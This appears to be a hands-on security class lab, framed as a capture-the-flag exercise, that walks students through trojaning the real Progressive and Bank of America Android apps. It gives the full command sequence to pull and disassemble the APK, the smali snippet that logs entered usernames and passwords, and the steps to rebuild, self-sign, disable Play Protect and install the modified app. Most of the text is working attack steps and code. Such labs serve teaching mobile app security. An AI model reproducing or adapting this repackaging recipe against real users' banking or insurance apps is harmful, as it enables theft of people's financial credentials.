M 401: Trojaning Progressive and Bank of America Apps (20 pts + 20 extra)

What You Need for This Project

Purpose

To practice unpacking an unprotected app, modifying it, and creating a modified app. This should not be easy to do, but it is because many companies don't bother to obfuscate their Dalvik code.

Responsible Disclosure

I notified Progressive about this in 2015 but they did not fix it.

Installing the Progressive App

In the App Store, install this app.

Progressive may change the app, which would make the steps below change somewhat, so you may prefer to use this archived copy of the version I used.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Pulling the APK from the Phone

To see the complete package name, on Kali, execute this command:
adb shell pm list packages | grep prog
The reply shows the package name, as shown below. Use that package name in the next command to get the APK path:
adb shell pm path com.phonevalley.progressive
The reply shiows the full path to the APK. Use that path in the next command to pull the APK file:
adb pull /data/app/com.phonevalley.progressive-yHPkfG7TWMsbngAN-RW68g==/base.apk
The file downloads into Kali, as shown below.

Disassembling the APK with apktool

On Kali, in a Terminal, execute this command:
apktool d -f -r base.apk
Apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "base", in many subfolders, as shown below.

It might seem difficult to hunt through all those files and folders for important items, but it's easy to do because the code is not obfuscated, and contains easily-guessed object names.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute this command:

grep -ir login . | grep password
This finds lines containing both "login" and "password", as shown below.

The lines are wide and wrap in a way that makes them difficult to read, so use "less" to clean them up:

grep -ir login . | grep password | less -S
Now it's easy to see that only a few files have interesting content. We'll edit the file highlighted in the image below.

Press Q to exit "less".

Viewing Smali Code

Execute this command:
nano ./base/smali_classes2/com/phonevalley/progressive/login/viewmodel/LoginViewModel.smali
The Smali file opens in nano. Type Ctrl+W to start a search. Type in this search string, as shown below.
loginOnlineAccount(

Press Enter. Type Ctrl+W again. Press Enter again.

You see the start of the ".method private loginOnlineAccount(" function, as shown below.

Inserting Trojan Code

We'll add code that puts the username and password into the log.

Notice the line highlighted in the image above that says:

.locals 5
That line reserves five local variables for use in this method. We need another variable to use, so change that line to:
.locals 6
as shown below.

Scroll down a little, and look at the code below the ".line 434" mark, as shown below.

On Jan 29, 2020 I repeated this project and the steps still work, but the line number is now 573.

This code puts the username into variable v2 and the password into variable v3. All we need to do is to put those variables into the log.

Carefully insert this code after the second "check-cast" statement, as shown below.

# TROJAN   
const-string v5, "TROJAN Stealing Progressive Credentials:"
invoke-static {v5, v2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
invoke-static {v5, v3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# END OF TROJAN 

Press Ctrl+X, Y, Enter to save the modified file.

Rebuilding the App

To build a new APK file from the modified code in the "base" directory,execute this command:
apktool b base
Apktool builds the app, as shown below.

Making a Code Signing Certificate

Android won't run unsigned apps, so we need a signing certificate.

Execute this command:

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
A prompt asks for a "keystore password". Enter password twice.

Then a series of question asks for your name, etc. You can press Enter for each question except the last one, which you must answer yes to, as shown below.

Signing the New APK

Execute this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore base/dist/base.apk alias_name
When you are prompted to, enter the key store password of password

Installing Jarsigner

If you see the message
jarsigner: command not found
execute these commands to install it:
sudo apt update
sudo apt install -y default-jdk
If you get "Hash Sum mismatch" errors, try these solutions:
The app is signed, as shown below.

Uninstalling the Original App

On your Android device, open Settings and tap these items, as shown below.

Disabling Play Protect

On your Android device, open "Play Store" and tap these items, as shown below.

Installing the Modified App

On Kali, in the Terminal, execute this command:
adb install base/dist/base.apk
The installation succeeds, as shown below.

Monitoring the Log

On Kali, in the Terminal, execute this command:
adb logcat
A lot of messages scroll by.

To make the display cleaner, press Ctrl+C and execute this command:

adb logcat | grep TROJAN
Now the scrolling stops, waiting for log entries containing the string "TROJAN", as shown below.

Using the Trojaned App

On your Genymotion Android device, open the Progressive app.

Enter fake credentials, using your name as the login name, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.

M 401.1: Log Entry (20 pts)

Find the text covered by a green box in the image above. That's the flag.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image showing the flag.

Save the image as "Proj M 401.1 from YOUR NAME".

Trojaning a Bank of America App (20 extra)

Responsible Disclosure

I notified Bank of America about this in 2015 but they did not fix it.

Challenge

Install this app:

 

If you prefer, you can use my archived copy here:

base.apk

Add a Trojan to steal the username and password, as shown below.

Hints

M 401.2: Smali Code (20 pts)

Examine the function you Trojaned in a text editor.

Find the text covered by a green box in the image below. That's the flag.

Capturing a Screen Image

Capture a WHOLE-DESKTOP image showing the flag.

Save the image as "Proj M 401.2 from YOUR NAME".


Converted to a CTF 2-28-19
Updated Jan 1-29-2020
Bank of America added 2-2-2020